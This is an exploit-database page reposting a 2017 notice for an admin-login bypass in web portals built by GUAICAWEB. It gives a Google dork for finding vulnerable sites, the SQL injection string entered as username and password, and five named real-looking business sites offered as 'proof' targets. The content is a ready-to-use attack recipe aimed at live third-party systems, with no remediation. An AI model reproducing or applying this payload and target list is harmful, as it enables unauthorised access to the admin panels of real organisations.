Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-522 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2017-01-21 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
PORTAL WEB GUAICAWEB Bypass Admin Page Vulnerability |=============================================================| |-------------------In The Name Of God------------------------| | | Exploit Title: PORTAL WEB DESARROLLADO POR GUAICAWEB COMUNICACIONES Bypass Admin Page Vulnerability | | Exploit Author: Ashiyane Digital Security Team | | Vendor Homepage:http://www.guaicaweb.com/ | | Google Dork : intext:PORTAL WEB DESARROLLADO POR GUAICAWEB COMUNICACIONES inurl:/index.php?target= | | Tested on: Windows 10 ~~~> Mozilla Firefox | | Date: 1/20/2017 |==========================================================| | Then Choose a Target and put this after URL : /admin/ |=========| | And fill username and password like the information below : | Username : '=' 'or' | Password : '=' 'or' | ==========================================================| | Proof : | | http://www.hotelimperial.com.ve/admin/ | | http://laboratoriosabd.com/admin/ | | http://www.guaicaweb.com/admin/ | | http://www.clinicalafe.com/admin/ | | http://www.metalplastic.com.ve/admin/ | |=============================================================| | Discovered By : HackFans |=============================================================
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.